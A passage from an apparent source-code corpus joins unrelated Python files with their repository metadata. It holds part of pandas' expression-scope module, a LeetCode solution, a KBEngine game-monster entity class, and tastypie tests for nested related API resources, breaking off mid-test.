resolvers=resolvers, target=target)
def _replacer(x):
"""Replace a number with its hexadecimal representation. Used to tag
temporary variables with their calling scope's id.
"""
# get the hex repr of the binary char and remove 0x and pad by pad_size
# zeros
try:
hexin = ord(x)
except TypeError:
# bytes literals masquerade as ints when iterating in py3
hexin = x
return hex(hexin)
def _raw_hex_id(obj):
"""Return the padded hexadecimal id of ``obj``."""
    # interpret as a pointer since that's really what id returns
packed = struct.pack('@P', id(obj))
return ''.join(map(_replacer, packed))
_DEFAULT_GLOBALS = {
'Timestamp': Timestamp,
'datetime': datetime.datetime,
'True': True,
'False': False,
'list': list,
'tuple': tuple,
'inf': np.inf,
'Inf': np.inf,
}
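# Editor's note: because these defaults seed every Scope, expressions such as
# pd.eval('Timestamp("2018-01-01")') can reference Timestamp, datetime, inf,
# etc. without the caller importing them.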
def _get_pretty_string(obj):
"""Return a prettier version of obj
Parameters
----------
obj : object
Object to pretty print
Returns
-------
s : str
Pretty print object repr
"""
sio = StringIO()
pprint.pprint(obj, stream=sio)
return sio.getvalue()
class Scope(StringMixin):
"""Object to hold scope, with a few bells to deal with some custom syntax
and contexts added by pandas.
Parameters
----------
level : int
global_dict : dict or None, optional, default None
local_dict : dict or Scope or None, optional, default None
resolvers : list-like or None, optional, default None
target : object
Attributes
----------
level : int
scope : DeepChainMap
target : object
temps : dict
"""
__slots__ = 'level', 'scope', 'target', 'temps'
def __init__(self, level, global_dict=None, local_dict=None, resolvers=(),
target=None):
self.level = level + 1
# shallow copy because we don't want to keep filling this up with what
# was there before if there are multiple calls to Scope/_ensure_scope
self.scope = DeepChainMap(_DEFAULT_GLOBALS.copy())
self.target = target
if isinstance(local_dict, Scope):
self.scope.update(local_dict.scope)
if local_dict.target is not None:
self.target = local_dict.target
self.update(local_dict.level)
frame = sys._getframe(self.level)
try:
# shallow copy here because we don't want to replace what's in
# scope when we align terms (alignment accesses the underlying
# numpy array of pandas objects)
self.scope = self.scope.new_child((global_dict or
frame.f_globals).copy())
if not isinstance(local_dict, Scope):
self.scope = self.scope.new_child((local_dict or
frame.f_locals).copy())
finally:
del frame
# assumes that resolvers are going from outermost scope to inner
if isinstance(local_dict, Scope):
resolvers += tuple(local_dict.resolvers.maps)
self.resolvers = DeepChainMap(*resolvers)
self.temps = {}
def __unicode__(self):
scope_keys = _get_pretty_string(list(self.scope.keys()))
res_keys = _get_pretty_string(list(self.resolvers.keys()))
unicode_str = '{name}(scope={scope_keys}, resolvers={res_keys})'
return unicode_str.format(name=type(self).__name__,
scope_keys=scope_keys,
res_keys=res_keys)
@property
def has_resolvers(self):
"""Return whether we have any extra scope.
        For example, DataFrames pass their columns as resolvers during calls to
``DataFrame.eval()`` and ``DataFrame.query()``.
Returns
-------
hr : bool
"""
return bool(len(self.resolvers))
def resolve(self, key, is_local):
"""Resolve a variable name in a possibly local context
Parameters
----------
key : text_type
A variable name
is_local : bool
Flag indicating whether the variable is local or not (prefixed with
the '@' symbol)
Returns
-------
value : object
The value of a particular variable
"""
try:
# only look for locals in outer scope
if is_local:
return self.scope[key]
# not a local variable so check in resolvers if we have them
if self.has_resolvers:
return self.resolvers[key]
# if we're here that means that we have no locals and we also have
# no resolvers
assert not is_local and not self.has_resolvers
return self.scope[key]
except KeyError:
try:
# last ditch effort we look in temporaries
# these are created when parsing indexing expressions
# e.g., df[df > 0]
return self.temps[key]
except KeyError:
raise compu.ops.UndefinedVariableError(key, is_local)
def swapkey(self, old_key, new_key, new_value=None):
"""Replace a variable name, with a potentially new value.
Parameters
----------
old_key : str
Current variable name to replace
new_key : str
New variable name to replace `old_key` with
new_value : object
Value to be replaced along with the possible renaming
"""
if self.has_resolvers:
maps = self.resolvers.maps + self.scope.maps
else:
maps = self.scope.maps
maps.append(self.temps)
for mapping in maps:
if old_key in mapping:
mapping[new_key] = new_value
return
def _get_vars(self, stack, scopes):
"""Get specifically scoped variables from a list of stack frames.
Parameters
----------
stack : list
A list of stack frames as returned by ``inspect.stack()``
scopes : sequence of strings
A sequence containing valid stack frame attribute names that
evaluate to a dictionary. For example, ('locals', 'globals')
"""
variables = itertools.product(scopes, stack)
for scope, (frame, _, _, _, _, _) in variables:
try:
d = getattr(frame, 'f_' + scope)
self.scope = self.scope.new_child(d)
finally:
# won't remove it, but DECREF it
                # in Py3 this probably isn't necessary since frame won't be
                # in scope after the loop
del frame
def update(self, level):
"""Update the current scope by going back `level` levels.
Parameters
----------
level : int or None, optional, default None
"""
sl = level + 1
# add sl frames to the scope starting with the
# most distant and overwriting with more current
# makes sure that we can capture variable scope
stack = inspect.stack()
try:
self._get_vars(stack[:sl], scopes=['locals'])
finally:
del stack[:], stack
def add_tmp(self, value):
"""Add a temporary variable to the scope.
Parameters
----------
value : object
An arbitrary object to be assigned to a temporary variable.
Returns
-------
name : basestring
The name of the temporary variable created.
"""
name = '{name}_{num}_{hex_id}'.format(name=type(value).__name__,
num=self.ntemps,
hex_id=_raw_hex_id(self))
# add to inner most scope
assert name not in self.temps
self.temps[name] = value
assert name in self.temps
# only increment if the variable gets put in the scope
return name
@property
def ntemps(self):
"""The number of temporary variables in this scope"""
return len(self.temps)
@property
def full_scope(self):
"""Return the full scope for use with passing to engines transparently
as a mapping.
Returns
-------
vars : DeepChainMap
All variables in this scope.
"""
maps = [self.temps] + self.resolvers.maps + self.scope.maps
return DeepChainMap(*maps)
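# Minimal usage sketch (editor's addition, not part of pandas itself): how a
# caller captures its own frame via _ensure_scope.
#
#     def f():
#         x = 10                        # local visible to the captured scope
#         env = _ensure_scope(level=0)  # snapshots f's locals and globals
#         return env.resolve('x', is_local=False)
#
#     f()  # -> 10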
|
MJuddBooth/pandas
|
pandas/core/computation/scope.py
|
Python
|
bsd-3-clause
| 9,212
|
"""Fun games to play! """
|
Ikusaba-san/Chiaki-Nanami
|
cogs/games/__init__.py
|
Python
|
mit
| 26
|
class Solution(object):
def maxRotateFunction(self, A):
"""
:type A: List[int]
:rtype: int
"""
        # Let F(k) be the rotate function after k clockwise rotations.
        # The recurrence F(k) = F(k-1) + sum(A) - len(A) * A[len(A)-k] lets us
        # scan every rotation in O(n) instead of recomputing each F(k).
        res = 0        # best improvement over F(0) seen so far (at least 0)
        prevDiff = 0   # F(i) - F(0), the improvement accumulated so far
        s = sum(A)
        for i in xrange(len(A) - 1):
            diff = s - len(A) * A[len(A) - 1 - i]  # F(i+1) - F(i)
            res = max(res, diff + prevDiff)        # candidate: F(i+1) - F(0)
            prevDiff += diff
        # F(0) = sum(i * A[i]); add the best improvement found above
        return res + sum([i * A[i] for i in xrange(len(A))]) if A else 0
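# Quick check (editor's addition): for A = [4, 3, 2, 6] the four rotations give
# F(0) = 25, F(1) = 16, F(2) = 23, F(3) = 26, so
#     Solution().maxRotateFunction([4, 3, 2, 6])  # -> 26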
|
Jacy-Wang/MyLeetCode
|
RotateFunction396.py
|
Python
|
gpl-2.0
| 420
|
# -*- coding: utf-8 -*-
import random
import math
import time
import KBEngine
import wtimer
from KBEDebug import *
from interfaces.Combat import Combat
from interfaces.Spell import Spell
from interfaces.Motion import Motion
from interfaces.State import State
from interfaces.Flags import Flags
from interfaces.AI import AI
from interfaces.NPCObject import NPCObject
class Monster(KBEngine.Entity,
NPCObject,
Flags,
State,
Motion,
Combat,
Spell,
AI):
def __init__(self):
KBEngine.Entity.__init__(self)
NPCObject.__init__(self)
Flags.__init__(self)
State.__init__(self)
Motion.__init__(self)
Combat.__init__(self)
Spell.__init__(self)
AI.__init__(self)
if self.modelID == 20002001:
            self.layer = 1  # the navmesh layer this entity is on; several layers can be set up for pathfinding
def initEntity(self):
"""
virtual method.
"""
pass
def checkInTerritory(self):
"""
virtual method.
        Check whether this entity is inside its allowed territory.
"""
return AI.checkInTerritory(self)
def isMonster(self):
"""
virtual method.
"""
return True
# ----------------------------------------------------------------
# callback
# ----------------------------------------------------------------
def onWitnessed(self, isWitnessed):
"""
KBEngine method.
        Called when this entity starts or stops being observed by any witness
        (player). This interface mainly lets the server do some performance
        optimisation: normally, when an entity is not observed by any client
        it does not need to do any work, and this interface can be used to
        activate or stop any behaviour of the entity at the appropriate time.
        @param isWitnessed : when False, the entity has left the view of all observers
"""
AI.onWitnessed(self, isWitnessed)
def onForbidChanged_(self, forbid, isInc):
"""
virtual method.
        The entity's forbid conditions changed.
        @param isInc : whether this is an increase
"""
State.onForbidChanged_(self, forbid, isInc)
AI.onForbidChanged_(self, forbid, isInc)
def onStateChanged_(self, oldstate, newstate):
"""
virtual method.
        The entity's state changed.
"""
State.onStateChanged_(self, oldstate, newstate)
AI.onStateChanged_(self, oldstate, newstate)
NPCObject.onStateChanged_(self, oldstate, newstate)
def onSubStateChanged_(self, oldSubState, newSubState):
"""
virtual method.
        The sub-state changed.
"""
State.onSubStateChanged_(self, oldSubState, newSubState)
AI.onSubStateChanged_(self, oldSubState, newSubState)
def onFlagsChanged_(self, flags, isInc):
"""
virtual method.
"""
Flags.onFlagsChanged_(self, flags, isInc)
AI.onFlagsChanged_(self, flags, isInc)
def onEnterTrap(self, entity, range_xz, range_y, controllerID, userarg):
"""
KBEngine method.
        Engine callback: triggered when an entity enters the trap.
"""
AI.onEnterTrap(self, entity, range_xz, range_y, controllerID, userarg)
def onLeaveTrap(self, entity, range_xz, range_y, controllerID, userarg):
"""
KBEngine method.
        Engine callback: triggered when an entity leaves the trap.
"""
AI.onLeaveTrap(self, entity, range_xz, range_y, controllerID, userarg)
def onAddEnemy(self, entityID):
"""
virtual method.
        An enemy entered the enemy list.
"""
AI.onAddEnemy(self, entityID)
Combat.onAddEnemy(self, entityID)
def onRemoveEnemy(self, entityID):
"""
virtual method.
        Remove an enemy from the list.
"""
AI.onRemoveEnemy(self, entityID)
Combat.onRemoveEnemy(self, entityID)
def onDestroy(self):
"""
        The entity is being destroyed.
"""
NPCObject.onDestroy(self)
Combat.onDestroy(self)
Monster._timermap = {}
Monster._timermap.update(NPCObject._timermap)
Monster._timermap.update(Flags._timermap)
Monster._timermap.update(State._timermap)
Monster._timermap.update(Motion._timermap)
Monster._timermap.update(Combat._timermap)
Monster._timermap.update(Spell._timermap)
Monster._timermap.update(AI._timermap)
|
LaoZhongGu/kbengine
|
demo/res/scripts/cell/Monster.py
|
Python
|
lgpl-3.0
| 3,929
|
from datetime import datetime
import json
import django
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.db.models.signals import pre_save
from django.test.testcases import TestCase
from tastypie import fields
from tastypie.exceptions import ApiFieldError, NotFound
from core.models import Note, MediaBit
from core.tests.mocks import MockRequest
from related_resource.api.resources import CategoryResource, ForumResource,\
FreshNoteResource, JobResource, NoteResource, OrderResource,\
NoteWithUpdatableUserResource, PersonResource, TagResource, UserResource
from related_resource.api.urls import api
from related_resource.models import Category, Label, Tag, Taggable,\
TaggableTag, ExtraData, Company, Person, Dog, DogHouse, Bone, Product,\
Address, Job, Payment, Forum, Order, OrderItem, Contact, ContactGroup
from testcases import TestCaseWithFixture
class M2MResourcesTestCase(TestCaseWithFixture):
def test_same_object_added(self):
"""
From Issue #1035
"""
user = User.objects.create(username='gjcourt')
ur = UserResource()
fr = ForumResource()
resp = self.client.post(fr.get_resource_uri(), content_type='application/json', data=json.dumps({
'name': 'Test Forum',
'members': [ur.get_resource_uri(user)],
'moderators': [ur.get_resource_uri(user)],
}))
self.assertEqual(resp.status_code, 201, resp.content)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(len(data['moderators']), 1)
self.assertEqual(len(data['members']), 1)
class RelatedResourceTest(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def setUp(self):
super(RelatedResourceTest, self).setUp()
self.user = User.objects.create(username="testy_mctesterson")
def test_cannot_access_user_resource(self):
resource = api.canonical_resource_for('users')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.set_body('{"username": "foobar"}')
resp = resource.wrap_view('dispatch_detail')(request, pk=self.user.pk)
self.assertEqual(resp.status_code, 405)
self.assertEqual(User.objects.get(id=self.user.id).username, self.user.username)
def test_related_resource_authorization(self):
resource = api.canonical_resource_for('notes')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body('{"content": "The cat is back. The dog coughed him up out back.", "created": "2010-04-03 20:05:00", "is_active": true, "slug": "cat-is-back", "title": "The Cat Is Back", "updated": "2010-04-03 20:05:00", "author": null}')
resp = resource.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(User.objects.get(id=self.user.id).username, 'testy_mctesterson')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body('{"content": "The cat is back. The dog coughed him up out back.", "created": "2010-04-03 20:05:00", "is_active": true, "slug": "cat-is-back-2", "title": "The Cat Is Back", "updated": "2010-04-03 20:05:00", "author": {"id": %s, "username": "foobar"}}' % self.user.id)
resp = resource.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(User.objects.get(id=self.user.id).username, 'foobar')
def test_ok_not_null_field_included(self):
"""
        Posting a new detail that includes the required (not-null) related
        field should succeed
"""
company = Company.objects.create()
resource = api.canonical_resource_for('product')
request = MockRequest()
body = json.dumps({
'producer': {'pk': company.pk},
})
request.set_body(body)
resp = resource.post_list(request)
self.assertEqual(resp.status_code, 201)
def test_apifielderror_missing_not_null_field(self):
"""
        Posting a new detail that omits a required (not-null) related field
        should raise ApiFieldError
"""
resource = api.canonical_resource_for('product')
request = MockRequest()
body = json.dumps({})
request.set_body(body)
with self.assertRaises(ApiFieldError):
resource.post_list(request)
class CategoryResourceTest(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def setUp(self):
super(CategoryResourceTest, self).setUp()
self.parent_cat_1 = Category.objects.create(parent=None, name='Dad')
self.parent_cat_2 = Category.objects.create(parent=None, name='Mom')
self.child_cat_1 = Category.objects.create(parent=self.parent_cat_1, name='Son')
self.child_cat_2 = Category.objects.create(parent=self.parent_cat_2, name='Daughter')
def test_correct_relation(self):
resource = api.canonical_resource_for('category')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'GET'
resp = resource.wrap_view('dispatch_detail')(request, pk=self.parent_cat_1.pk)
self.assertEqual(resp.status_code, 200)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(data['parent'], None)
self.assertEqual(data['name'], 'Dad')
# Now try a child.
resp = resource.wrap_view('dispatch_detail')(request, pk=self.child_cat_2.pk)
self.assertEqual(resp.status_code, 200)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(data['parent'], '/v1/category/2/')
self.assertEqual(data['name'], 'Daughter')
def test_put_null(self):
resource = api.canonical_resource_for('category')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.set_body('{"parent": null, "name": "Son"}')
# Before the PUT, there should be a parent.
self.assertEqual(Category.objects.get(pk=self.child_cat_1.pk).parent.pk, self.parent_cat_1.pk)
# After the PUT, the parent should be ``None``.
resp = resource.put_detail(request, pk=self.child_cat_1.pk)
self.assertEqual(resp.status_code, 204)
self.assertEqual(Category.objects.get(pk=self.child_cat_1.pk).name, 'Son')
self.assertEqual(Category.objects.get(pk=self.child_cat_1.pk).parent, None)
class ExplicitM2MResourceRegressionTest(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def setUp(self):
super(ExplicitM2MResourceRegressionTest, self).setUp()
self.tag_1 = Tag.objects.create(name='important')
self.taggable_1 = Taggable.objects.create(name='exam')
# Create relations between tags and taggables through the explicit m2m table
self.taggabletag_1 = TaggableTag.objects.create(tag=self.tag_1, taggable=self.taggable_1)
# Give each tag some extra data (the lookup of this data is what makes the test fail)
self.extradata_1 = ExtraData.objects.create(tag=self.tag_1, name='additional')
def test_correct_setup(self):
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'GET'
        # Verify the explicit 'through' relationship has been created correctly
resource = api.canonical_resource_for('taggabletag')
resp = resource.wrap_view('dispatch_detail')(request, pk=self.taggabletag_1.pk)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(resp.status_code, 200)
self.assertEqual(data['tag'], '/v1/tag/1/')
self.assertEqual(data['taggable'], '/v1/taggable/1/')
resource = api.canonical_resource_for('taggable')
resp = resource.wrap_view('dispatch_detail')(request, pk=self.taggable_1.pk)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(resp.status_code, 200)
self.assertEqual(data['name'], 'exam')
resource = api.canonical_resource_for('tag')
request.path = "/v1/tag/%(pk)s/" % {'pk': self.tag_1.pk}
resp = resource.wrap_view('dispatch_detail')(request, pk=self.tag_1.pk)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(resp.status_code, 200)
self.assertEqual(data['name'], 'important')
# and check whether the extradata is present
self.assertEqual(data['extradata']['name'], u'additional')
def test_post_new_tag(self):
resource = api.canonical_resource_for('tag')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body('{"name": "school", "taggabletags": [ ]}')
# Prior to the addition of ``blank=True``, this would
# fail badly.
resp = resource.wrap_view('dispatch_list')(request)
self.assertEqual(resp.status_code, 201)
# GET the created object (through its headers.location)
self.assertTrue(resp.has_header('location'))
location = resp['Location']
resp = self.client.get(location, data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
deserialized = json.loads(resp.content.decode('utf-8'))
self.assertEqual(len(deserialized), 5)
self.assertEqual(deserialized['name'], 'school')
class OneToManySetupTestCase(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def test_one_to_many(self):
# Sanity checks.
self.assertEqual(Note.objects.count(), 2)
self.assertEqual(MediaBit.objects.count(), 0)
fnr = FreshNoteResource()
data = {
'title': 'Create with related URIs',
'slug': 'create-with-related-uris',
'content': 'Some content here',
'is_active': True,
'media_bits': [
{
'title': 'Picture #1'
}
]
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
resp = fnr.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Note.objects.count(), 3)
note = Note.objects.latest('created')
self.assertEqual(note.media_bits.count(), 1)
self.assertEqual(note.media_bits.all()[0].title, u'Picture #1')
class FullCategoryResource(CategoryResource):
parent = fields.ToOneField('self', 'parent', null=True, full=True)
class RelationshipOppositeFromModelTestCase(TestCaseWithFixture):
"""
    On the model, the Job relationship is defined on Payment.
    On the resource, PaymentResource is additionally defined on JobResource.
"""
def setUp(self):
super(RelationshipOppositeFromModelTestCase, self).setUp()
# a job with a payment exists to start with
self.some_time_str = datetime.now().strftime('%Y-%m-%d %H:%M')
job = Job.objects.create(name='SomeJob')
Payment.objects.create(job=job, scheduled=self.some_time_str)
def test_create_similar(self):
        # We submit a job with the related payment included.
        # Note that on the resource side, the payment related resource is
        # defined on JobResource. On the model side, the Job class does not
        # have a payment field, but it has a reverse relationship defined by
        # the Payment class.
resource = JobResource()
data = {
'name': 'OtherJob',
'payment': {
'scheduled': self.some_time_str
}
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
resp = resource.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Job.objects.count(), 2)
self.assertEqual(Payment.objects.count(), 2)
new_job = Job.objects.all().order_by('-id')[0]
new_payment = Payment.objects.all().order_by('-id')[0]
self.assertEqual(new_job.name, 'OtherJob')
self.assertEqual(new_job, new_payment.job)
class RelatedPatchTestCase(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def test_patch_to_one(self):
resource = FullCategoryResource()
cat1 = Category.objects.create(name='Dad')
cat2 = Category.objects.create(parent=cat1, name='Child')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PATCH'
request.path = "/v1/category/%(pk)s/" % {'pk': cat2.pk}
data = {
'name': 'Kid'
}
request.set_body(json.dumps(data))
self.assertEqual(cat2.name, 'Child')
resp = resource.patch_detail(request, pk=cat2.pk)
self.assertEqual(resp.status_code, 202)
cat2 = Category.objects.get(pk=2)
self.assertEqual(cat2.name, 'Kid')
def test_patch_detail_with_missing_related_fields(self):
"""
When fields are excluded the value of the field should not be set to a
default value if updated by tastypie.
"""
resource = NoteWithUpdatableUserResource()
note = Note.objects.create(author_id=1)
user = User.objects.get(pk=1)
self.assertEqual(user.password, 'this_is_not_a_valid_password_string')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PATCH'
request.path = "/v1/noteswithupdatableuser/%(pk)s/" % {'pk': note.pk}
data = {
'author': {
'id': 1,
'username': 'johndoe',
'email': 'john@doetown.com',
}
}
request.set_body(json.dumps(data))
resp = resource.patch_detail(request, pk=note.pk)
self.assertEqual(resp.status_code, 202)
user2 = User.objects.get(pk=1)
self.assertEqual(user2.email, 'john@doetown.com')
self.assertEqual(user2.password, 'this_is_not_a_valid_password_string')
def test_patch_detail_dont_update_related_without_permission(self):
"""
When fields are excluded the value of the field should not be set to a
default value if updated by tastypie.
"""
resource = NoteResource()
note = Note.objects.create(author_id=1)
user = User.objects.get(pk=1)
self.assertEqual(user.password, 'this_is_not_a_valid_password_string')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PATCH'
request.path = "/v1/note/%(pk)s/" % {'pk': note.pk}
data = {
'author': {
'id': 1,
'username': 'johndoe',
'email': 'john@doetown.com',
}
}
request.set_body(json.dumps(data))
resp = resource.patch_detail(request, pk=note.pk)
self.assertEqual(resp.status_code, 202)
user2 = User.objects.get(pk=1)
self.assertEqual(user2.email, 'john@doetown.com')
self.assertEqual(user2.password, 'this_is_not_a_valid_password_string')
class NestedRelatedResourceTest(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def test_one_to_one(self):
"""
Test a related ToOne resource with a nested full ToOne resource
"""
self.assertEqual(Person.objects.count(), 0)
self.assertEqual(Company.objects.count(), 0)
self.assertEqual(Address.objects.count(), 0)
pr = PersonResource()
data = {
'name': 'Joan Rivers',
'company': {
'name': 'Yum Yum Pie Factory!',
'address': {
'line': 'Somewhere, Utah'
}
}
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
resp = pr.post_list(request)
self.assertEqual(resp.status_code, 201)
pk = Person.objects.all()[0].pk
request = MockRequest()
request.method = 'GET'
request.path = reverse('api_dispatch_detail', kwargs={
'pk': pk,
'resource_name': pr._meta.resource_name,
'api_name': pr._meta.api_name
})
resp = pr.get_detail(request, pk=pk)
self.assertEqual(resp.status_code, 200)
person = json.loads(resp.content.decode('utf-8'))
self.assertEqual(person['name'], 'Joan Rivers')
company = person['company']
self.assertEqual(company['name'], 'Yum Yum Pie Factory!')
address = company['address']
self.assertEqual(address['line'], 'Somewhere, Utah')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.path = reverse('api_dispatch_detail', kwargs={
'pk': pk,
'resource_name': pr._meta.resource_name,
'api_name': pr._meta.api_name
})
request.set_body(resp.content.decode('utf-8'))
resp = pr.put_detail(request, pk=pk)
self.assertEqual(resp.status_code, 204)
def test_one_to_many(self):
"""
Test a related ToOne resource with a nested full ToMany resource
"""
self.assertEqual(Person.objects.count(), 0)
self.assertEqual(Company.objects.count(), 0)
self.assertEqual(Product.objects.count(), 0)
pr = PersonResource()
data = {
'name': 'Joan Rivers',
'company': {
'name': 'Yum Yum Pie Factory!',
'products': [
{
'name': 'Tasty Pie'
}
]
}
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
resp = pr.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Person.objects.count(), 1)
self.assertEqual(Company.objects.count(), 1)
self.assertEqual(Product.objects.count(), 1)
pk = Person.objects.all()[0].pk
request = MockRequest()
request.method = 'GET'
resp = pr.get_detail(request, pk=pk)
self.assertEqual(resp.status_code, 200)
person = json.loads(resp.content.decode('utf-8'))
self.assertEqual(person['name'], 'Joan Rivers')
company = person['company']
self.assertEqual(company['name'], 'Yum Yum Pie Factory!')
self.assertEqual(len(company['products']), 1)
product = company['products'][0]
self.assertEqual(product['name'], 'Tasty Pie')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.set_body(json.dumps(person))
resp = pr.put_detail(request, pk=pk)
self.assertEqual(resp.status_code, 204)
def test_many_to_one(self):
"""
Test a related ToMany resource with a nested full ToOne resource
"""
self.assertEqual(Person.objects.count(), 0)
self.assertEqual(Dog.objects.count(), 0)
self.assertEqual(DogHouse.objects.count(), 0)
pr = PersonResource()
data = {
'name': 'Joan Rivers',
'dogs': [
{
'name': 'Snoopy',
'house': {
'color': 'Red'
}
}
]
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
resp = pr.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Person.objects.count(), 1)
self.assertEqual(Dog.objects.count(), 1)
self.assertEqual(DogHouse.objects.count(), 1)
pk = Person.objects.all()[0].pk
request = MockRequest()
request.method = 'GET'
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.get_detail(request, pk=pk)
self.assertEqual(resp.status_code, 200)
person = json.loads(resp.content.decode('utf-8'))
self.assertEqual(person['name'], 'Joan Rivers')
self.assertEqual(len(person['dogs']), 1)
dog = person['dogs'][0]
self.assertEqual(dog['name'], 'Snoopy')
house = dog['house']
self.assertEqual(house['color'], 'Red')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.set_body(json.dumps(person))
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.put_detail(request, pk=pk)
self.assertEqual(resp.status_code, 204)
def test_many_to_one_extra_data_ignored(self):
"""
        Test a related ToMany resource with a nested full ToOne resource.
        A FieldError would previously result when extra data was included
        on an embedded resource for an already saved object.
"""
self.assertEqual(Person.objects.count(), 0)
self.assertEqual(Dog.objects.count(), 0)
self.assertEqual(DogHouse.objects.count(), 0)
pr = PersonResource()
data = {
'name': 'Joan Rivers',
'dogs': [
{
'name': 'Snoopy',
'house': {
'color': 'Red'
}
}
]
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
resp = pr.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Person.objects.count(), 1)
self.assertEqual(Dog.objects.count(), 1)
self.assertEqual(DogHouse.objects.count(), 1)
pk = Person.objects.all()[0].pk
request = MockRequest()
request.method = 'GET'
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.get_detail(request, pk=pk)
self.assertEqual(resp.status_code, 200)
person = json.loads(resp.content.decode('utf-8'))
self.assertEqual(person['name'], 'Joan Rivers')
self.assertEqual(len(person['dogs']), 1)
dog = person['dogs'][0]
self.assertEqual(dog['name'], 'Snoopy')
house = dog['house']
self.assertEqual(house['color'], 'Red')
        # Clients may include extra data, which should be ignored. Make sure
        # extra data is ignored on the resource and sub-resources.
person['thisfieldshouldbeignored'] = 'foobar'
person['dogs'][0]['thisfieldshouldbeignored'] = 'foobar'
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.set_body(json.dumps(person))
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.put_detail(request, pk=pk)
self.assertEqual(resp.status_code, 204)
def test_many_to_many(self):
"""
Test a related ToMany resource with a nested full ToMany resource
"""
self.assertEqual(Person.objects.count(), 0)
self.assertEqual(Dog.objects.count(), 0)
self.assertEqual(Bone.objects.count(), 0)
pr = PersonResource()
data = {
'name': 'Joan Rivers',
'dogs': [
{
'name': 'Snoopy',
'bones': [
{
'color': 'white'
}
]
}
]
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.path = reverse('api_dispatch_list', kwargs={'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
request.set_body(json.dumps(data))
resp = pr.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Person.objects.count(), 1)
self.assertEqual(Dog.objects.count(), 1)
self.assertEqual(Bone.objects.count(), 1)
pk = Person.objects.all()[0].pk
request = MockRequest()
request.method = 'GET'
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.get_detail(request, pk=pk)
self.assertEqual(resp.status_code, 200)
person = json.loads(resp.content.decode('utf-8'))
self.assertEqual(person['name'], 'Joan Rivers')
self.assertEqual(len(person['dogs']), 1)
dog = person['dogs'][0]
self.assertEqual(dog['name'], 'Snoopy')
self.assertEqual(len(dog['bones']), 1)
bone = dog['bones'][0]
self.assertEqual(bone['color'], 'white')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request.set_body(json.dumps(person))
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.put_detail(request, pk=pk)
self.assertEqual(resp.status_code, 204)
def test_many_to_many_change_nested(self):
"""
Test a related ToMany resource with a nested full ToMany resource
"""
self.assertEqual(Person.objects.count(), 0)
self.assertEqual(Dog.objects.count(), 0)
self.assertEqual(Bone.objects.count(), 0)
pr = PersonResource()
person = Person.objects.create(name='Joan Rivers')
dog = person.dogs.create(name='Snoopy')
bone = dog.bones.create(color='white')
pk = person.pk
request = MockRequest()
request.method = 'GET'
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.get_detail(request, pk=pk)
self.assertEqual(resp.status_code, 200)
data = json.loads(resp.content.decode('utf-8'))
self.assertEqual(data['dogs'][0]['bones'][0]['color'], 'white')
# Change just a nested resource via PUT
request = MockRequest()
